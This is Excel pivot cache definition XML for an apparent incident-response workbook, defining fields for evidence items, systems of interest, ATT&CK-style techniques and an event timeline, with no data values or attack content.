    <cacheHierarchy uniqueName="[MT].[is sub-technique]" caption="is sub-technique" attribute="1" defaultMemberUniqueName="[MT].[is sub-technique].[All]" allUniqueName="[MT].[is sub-technique].[All]" dimensionUniqueName="[MT]" displayFolder="" count="2" memberValueDatatype="11" unbalanced="0">
      <fieldsUsage count="2">
        <fieldUsage x="-1"/>
        <fieldUsage x="1"/>
      </fieldsUsage>
    </cacheHierarchy>
    <cacheHierarchy uniqueName="[MT].[sub-technique of]" caption="sub-technique of" attribute="1" defaultMemberUniqueName="[MT].[sub-technique of].[All]" allUniqueName="[MT].[sub-technique of].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[contributors]" caption="contributors" attribute="1" defaultMemberUniqueName="[MT].[contributors].[All]" allUniqueName="[MT].[contributors].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[permissions required]" caption="permissions required" attribute="1" defaultMemberUniqueName="[MT].[permissions required].[All]" allUniqueName="[MT].[permissions required].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[defenses bypassed]" caption="defenses bypassed" attribute="1" defaultMemberUniqueName="[MT].[defenses bypassed].[All]" allUniqueName="[MT].[defenses bypassed].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[supports remote]" caption="supports remote" attribute="1" defaultMemberUniqueName="[MT].[supports remote].[All]" allUniqueName="[MT].[supports remote].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="11" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Hostname]" caption="Hostname" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Hostname].[All]" allUniqueName="[SystemOfInterest].[Hostname].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Date Added]" caption="Date Added" attribute="1" time="1" defaultMemberUniqueName="[SystemOfInterest].[Date Added].[All]" allUniqueName="[SystemOfInterest].[Date Added].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="7" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Added by]" caption="Added by" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Added by].[All]" allUniqueName="[SystemOfInterest].[Added by].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Domain]" caption="Domain" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Domain].[All]" allUniqueName="[SystemOfInterest].[Domain].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[OS]" caption="OS" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[OS].[All]" allUniqueName="[SystemOfInterest].[OS].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[IPv4 Address]" caption="IPv4 Address" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[IPv4 Address].[All]" allUniqueName="[SystemOfInterest].[IPv4 Address].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Function]" caption="Function" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Function].[All]" allUniqueName="[SystemOfInterest].[Function].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Status]" caption="Status" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Status].[All]" allUniqueName="[SystemOfInterest].[Status].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Evidence Available]" caption="Evidence Available" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Evidence Available].[All]" allUniqueName="[SystemOfInterest].[Evidence Available].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Reason to be Added [eg why evidence collected]]]" caption="Reason to be Added [eg why evidence collected]" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Reason to be Added [eg why evidence collected]]].[All]" allUniqueName="[SystemOfInterest].[Reason to be Added [eg why evidence collected]]].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Main Analyst]" caption="Main Analyst" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Main Analyst].[All]" allUniqueName="[SystemOfInterest].[Main Analyst].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[System tracking sheet completed]" caption="System tracking sheet completed" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[System tracking sheet completed].[All]" allUniqueName="[SystemOfInterest].[System tracking sheet completed].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Owned by Compromised Account]" caption="Owned by Compromised Account" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Owned by Compromised Account].[All]" allUniqueName="[SystemOfInterest].[Owned by Compromised Account].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Notes]" caption="Notes" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Notes].[All]" allUniqueName="[SystemOfInterest].[Notes].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Location]" caption="Location" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Location].[All]" allUniqueName="[SystemOfInterest].[Location].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Earliest Evidence of Compromise]" caption="Earliest Evidence of Compromise" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Earliest Evidence of Compromise].[All]" allUniqueName="[SystemOfInterest].[Earliest Evidence of Compromise].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Data Available]" caption="Data Available" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Data Available].[All]" allUniqueName="[SystemOfInterest].[Data Available].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Analysis Status]" caption="Analysis Status" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Analysis Status].[All]" allUniqueName="[SystemOfInterest].[Analysis Status].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Priority]" caption="Priority" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Priority].[All]" allUniqueName="[SystemOfInterest].[Priority].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[Reporting Level]" caption="Reporting Level" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[Reporting Level].[All]" allUniqueName="[SystemOfInterest].[Reporting Level].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[SystemOfInterest].[In Timeline?]" caption="In Timeline?" attribute="1" defaultMemberUniqueName="[SystemOfInterest].[In Timeline?].[All]" allUniqueName="[SystemOfInterest].[In Timeline?].[All]" dimensionUniqueName="[SystemOfInterest]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[source ID]" caption="source ID" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[source ID].[All]" allUniqueName="[Table_techniques_addressed].[source ID].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[source name]" caption="source name" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[source name].[All]" allUniqueName="[Table_techniques_addressed].[source name].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[source type]" caption="source type" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[source type].[All]" allUniqueName="[Table_techniques_addressed].[source type].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[mapping type]" caption="mapping type" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[mapping type].[All]" allUniqueName="[Table_techniques_addressed].[mapping type].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[target ID]" caption="target ID" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[target ID].[All]" allUniqueName="[Table_techniques_addressed].[target ID].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[target name]" caption="target name" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[target name].[All]" allUniqueName="[Table_techniques_addressed].[target name].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[target type]" caption="target type" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[target type].[All]" allUniqueName="[Table_techniques_addressed].[target type].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Table_techniques_addressed].[mapping description]" caption="mapping description" attribute="1" defaultMemberUniqueName="[Table_techniques_addressed].[mapping description].[All]" allUniqueName="[Table_techniques_addressed].[mapping description].[All]" dimensionUniqueName="[Table_techniques_addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[source ID]" caption="source ID" attribute="1" defaultMemberUniqueName="[techniques addressed].[source ID].[All]" allUniqueName="[techniques addressed].[source ID].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[source name]" caption="source name" attribute="1" defaultMemberUniqueName="[techniques addressed].[source name].[All]" allUniqueName="[techniques addressed].[source name].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[source type]" caption="source type" attribute="1" defaultMemberUniqueName="[techniques addressed].[source type].[All]" allUniqueName="[techniques addressed].[source type].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[mapping type]" caption="mapping type" attribute="1" defaultMemberUniqueName="[techniques addressed].[mapping type].[All]" allUniqueName="[techniques addressed].[mapping type].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[target ID]" caption="target ID" attribute="1" defaultMemberUniqueName="[techniques addressed].[target ID].[All]" allUniqueName="[techniques addressed].[target ID].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[target name]" caption="target name" attribute="1" defaultMemberUniqueName="[techniques addressed].[target name].[All]" allUniqueName="[techniques addressed].[target name].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[target type]" caption="target type" attribute="1" defaultMemberUniqueName="[techniques addressed].[target type].[All]" allUniqueName="[techniques addressed].[target type].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[techniques addressed].[mapping description]" caption="mapping description" attribute="1" defaultMemberUniqueName="[techniques addressed].[mapping description].[All]" allUniqueName="[techniques addressed].[mapping description].[All]" dimensionUniqueName="[techniques addressed]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Date/Time (UTC)]" caption="Date/Time (UTC)" attribute="1" time="1" defaultMemberUniqueName="[Timeline].[Date/Time (UTC)].[All]" allUniqueName="[Timeline].[Date/Time (UTC)].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="7" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Notable Event]" caption="Notable Event" attribute="1" defaultMemberUniqueName="[Timeline].[Notable Event].[All]" allUniqueName="[Timeline].[Notable Event].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Date added]" caption="Date added" attribute="1" defaultMemberUniqueName="[Timeline].[Date added].[All]" allUniqueName="[Timeline].[Date added].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Added by]" caption="Added by" attribute="1" defaultMemberUniqueName="[Timeline].[Added by].[All]" allUniqueName="[Timeline].[Added by].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Hostname (from evidence)]" caption="Hostname (from evidence)" attribute="1" defaultMemberUniqueName="[Timeline].[Hostname (from evidence)].[All]" allUniqueName="[Timeline].[Hostname (from evidence)].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Src hostname]" caption="Src hostname" attribute="1" defaultMemberUniqueName="[Timeline].[Src hostname].[All]" allUniqueName="[Timeline].[Src hostname].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Src Account]" caption="Src Account" attribute="1" defaultMemberUniqueName="[Timeline].[Src Account].[All]" allUniqueName="[Timeline].[Src Account].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Dst hostname/IP]" caption="Dst hostname/IP" attribute="1" defaultMemberUniqueName="[Timeline].[Dst hostname/IP].[All]" allUniqueName="[Timeline].[Dst hostname/IP].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Dst Account]" caption="Dst Account" attribute="1" defaultMemberUniqueName="[Timeline].[Dst Account].[All]" allUniqueName="[Timeline].[Dst Account].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Event Type]" caption="Event Type" attribute="1" defaultMemberUniqueName="[Timeline].[Event Type].[All]" allUniqueName="[Timeline].[Event Type].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Artifact source]" caption="Artifact source" attribute="1" defaultMemberUniqueName="[Timeline].[Artifact source].[All]" allUniqueName="[Timeline].[Artifact source].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Event ID]" caption="Event ID" attribute="1" defaultMemberUniqueName="[Timeline].[Event ID].[All]" allUniqueName="[Timeline].[Event ID].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Description]" caption="Description" attribute="1" defaultMemberUniqueName="[Timeline].[Description].[All]" allUniqueName="[Timeline].[Description].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[ATT&amp;CK Technique]" caption="ATT&amp;CK Technique" attribute="1" defaultMemberUniqueName="[Timeline].[ATT&amp;CK Technique].[All]" allUniqueName="[Timeline].[ATT&amp;CK Technique].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[ATT&amp;CK Subtechnique]" caption="ATT&amp;CK Subtechnique" attribute="1" defaultMemberUniqueName="[Timeline].[ATT&amp;CK Subtechnique].[All]" allUniqueName="[Timeline].[ATT&amp;CK Subtechnique].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Timeline].[Notes]" caption="Notes" attribute="1" defaultMemberUniqueName="[Timeline].[Notes].[All]" allUniqueName="[Timeline].[Notes].[All]" dimensionUniqueName="[Timeline]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count Evidence]" caption="__XL_Count Evidence" measure="1" displayFolder="" measureGroup="Evidence" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count SystemOfInterest]" caption="__XL_Count SystemOfInterest" measure="1" displayFolder="" measureGroup="SystemOfInterest" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count MT]" caption="__XL_Count MT" measure="1" displayFolder="" measureGroup="MT" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count techniques addressed]" caption="__XL_Count techniques addressed" measure="1" displayFolder="" measureGroup="techniques addressed" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count Table_techniques_addressed]" caption="__XL_Count Table_techniques_addressed" measure="1" displayFolder="" measureGroup="Table_techniques_addressed" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[__XL_Count Timeline]" caption="__XL_Count Timeline" measure="1" displayFolder="" measureGroup="Timeline" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[__No measures defined]" caption="__No measures defined" measure="1" displayFolder="" count="0" hidden="1"/>
    <cacheHierarchy uniqueName="[Measures].[Count of ID]" caption="Count of ID" measure="1" displayFolder="" measureGroup="MT" count="0" hidden="1">
      <extLst>
        <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{B97F6D7D-B522-45F9-BDA1-12C45D357490}">
          <x15:cacheHierarchy aggregatedColumn="18"/>
        </ext>
      </extLst>
    </cacheHierarchy>
  </cacheHierarchies>
  <kpis count="0"/>
  <dimensions count="7">
    <dimension name="Evidence" uniqueName="[Evidence]" caption="Evidence"/>
    <dimension measure="1" name="Measures" uniqueName="[Measures]" caption="Measures"/>
    <dimension name="MT" uniqueName="[MT]" caption="MT"/>
    <dimension name="SystemOfInterest" uniqueName="[SystemOfInterest]" caption="SystemOfInterest"/>
    <dimension name="Table_techniques_addressed" uniqueName="[Table_techniques_addressed]" caption="Table_techniques_addressed"/>
    <dimension name="techniques addressed" uniqueName="[techniques addressed]" caption="techniques addressed"/>
    <dimension name="Timeline" uniqueName="[Timeline]" caption="Timeline"/>
  </dimensions>
  <measureGroups count="6">
    <measureGroup name="Evidence" caption="Evidence"/>
    <measureGroup name="MT" caption="MT"/>
    <measureGroup name="SystemOfInterest" caption="SystemOfInterest"/>
    <measureGroup name="Table_techniques_addressed" caption="Table_techniques_addressed"/>
    <measureGroup name="techniques addressed" caption="techniques addressed"/>
    <measureGroup name="Timeline" caption="Timeline"/>
  </measureGroups>
  <maps count="9">
    <map measureGroup="0" dimension="0"/>
    <map measureGroup="0" dimension="3"/>
    <map measureGroup="1" dimension="2"/>
    <map measureGroup="2" dimension="3"/>
    <map measureGroup="3" dimension="2"/>
    <map measureGroup="3" dimension="4"/>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dang Sen" refreshedDate="44417.608894328703" backgroundQuery="1" createdVersion="3" refreshedVersion="6" minRefreshableVersion="3" recordCount="0" supportSubquery="1" supportAdvancedDrill="1" xr:uid="{011AAA3D-300B-43E5-ABE2-06F0820461A4}">
  <cacheSource type="external" connectionId="3">
    <extLst>
      <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{F057638F-6D5F-4e77-A914-E7F072B9BCA8}">
        <x14:sourceConnection name="ThisWorkbookDataModel"/>
      </ext>
    </extLst>
  </cacheSource>
  <cacheFields count="0"/>
  <cacheHierarchies count="95">
    <cacheHierarchy uniqueName="[Evidence].[Hostname]" caption="Hostname" attribute="1" defaultMemberUniqueName="[Evidence].[Hostname].[All]" allUniqueName="[Evidence].[Hostname].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Date Added]" caption="Date Added" attribute="1" time="1" defaultMemberUniqueName="[Evidence].[Date Added].[All]" allUniqueName="[Evidence].[Date Added].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="7" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Added By]" caption="Added By" attribute="1" defaultMemberUniqueName="[Evidence].[Added By].[All]" allUniqueName="[Evidence].[Added By].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Type]" caption="Type" attribute="1" defaultMemberUniqueName="[Evidence].[Type].[All]" allUniqueName="[Evidence].[Type].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Status]" caption="Status" attribute="1" defaultMemberUniqueName="[Evidence].[Status].[All]" allUniqueName="[Evidence].[Status].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Evidence Tag]" caption="Evidence Tag" attribute="1" defaultMemberUniqueName="[Evidence].[Evidence Tag].[All]" allUniqueName="[Evidence].[Evidence Tag].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[OS]" caption="OS" attribute="1" defaultMemberUniqueName="[Evidence].[OS].[All]" allUniqueName="[Evidence].[OS].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Analyst]" caption="Analyst" attribute="1" defaultMemberUniqueName="[Evidence].[Analyst].[All]" allUniqueName="[Evidence].[Analyst].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[When Collected]" caption="When Collected" attribute="1" defaultMemberUniqueName="[Evidence].[When Collected].[All]" allUniqueName="[Evidence].[When Collected].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Received Date]" caption="Received Date" attribute="1" defaultMemberUniqueName="[Evidence].[Received Date].[All]" allUniqueName="[Evidence].[Received Date].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Received by]" caption="Received by" attribute="1" defaultMemberUniqueName="[Evidence].[Received by].[All]" allUniqueName="[Evidence].[Received by].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Verified by]" caption="Verified by" attribute="1" defaultMemberUniqueName="[Evidence].[Verified by].[All]" allUniqueName="[Evidence].[Verified by].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Data Location]" caption="Data Location" attribute="1" defaultMemberUniqueName="[Evidence].[Data Location].[All]" allUniqueName="[Evidence].[Data Location].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Image Name]" caption="Image Name" attribute="1" defaultMemberUniqueName="[Evidence].[Image Name].[All]" allUniqueName="[Evidence].[Image Name].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Acquisition MD5]" caption="Acquisition MD5" attribute="1" defaultMemberUniqueName="[Evidence].[Acquisition MD5].[All]" allUniqueName="[Evidence].[Acquisition MD5].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Acquisition SHA1]" caption="Acquisition SHA1" attribute="1" defaultMemberUniqueName="[Evidence].[Acquisition SHA1].[All]" allUniqueName="[Evidence].[Acquisition SHA1].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Encryption key]" caption="Encryption key" attribute="1" defaultMemberUniqueName="[Evidence].[Encryption key].[All]" allUniqueName="[Evidence].[Encryption key].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[Evidence].[Notes]" caption="Notes" attribute="1" defaultMemberUniqueName="[Evidence].[Notes].[All]" allUniqueName="[Evidence].[Notes].[All]" dimensionUniqueName="[Evidence]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[ID]" caption="ID" attribute="1" defaultMemberUniqueName="[MT].[ID].[All]" allUniqueName="[MT].[ID].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[name]" caption="name" attribute="1" defaultMemberUniqueName="[MT].[name].[All]" allUniqueName="[MT].[name].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[description]" caption="description" attribute="1" defaultMemberUniqueName="[MT].[description].[All]" allUniqueName="[MT].[description].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[url]" caption="url" attribute="1" defaultMemberUniqueName="[MT].[url].[All]" allUniqueName="[MT].[url].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[created]" caption="created" attribute="1" time="1" defaultMemberUniqueName="[MT].[created].[All]" allUniqueName="[MT].[created].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="7" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[last modified]" caption="last modified" attribute="1" time="1" defaultMemberUniqueName="[MT].[last modified].[All]" allUniqueName="[MT].[last modified].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="7" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[version]" caption="version" attribute="1" defaultMemberUniqueName="[MT].[version].[All]" allUniqueName="[MT].[version].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="5" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[tactics]" caption="tactics" attribute="1" defaultMemberUniqueName="[MT].[tactics].[All]" allUniqueName="[MT].[tactics].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[detection]" caption="detection" attribute="1" defaultMemberUniqueName="[MT].[detection].[All]" allUniqueName="[MT].[detection].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
    <cacheHierarchy uniqueName="[MT].[platforms]" caption="platforms" attribute="1" defaultMemberUniqueName="[MT].[platforms].[All]" allUniqueName="[MT].[platforms].[All]" dimensionUniqueName="[MT]" displayFolder="" count="0" memberValueDatatype="130" unbalanced="0"/>
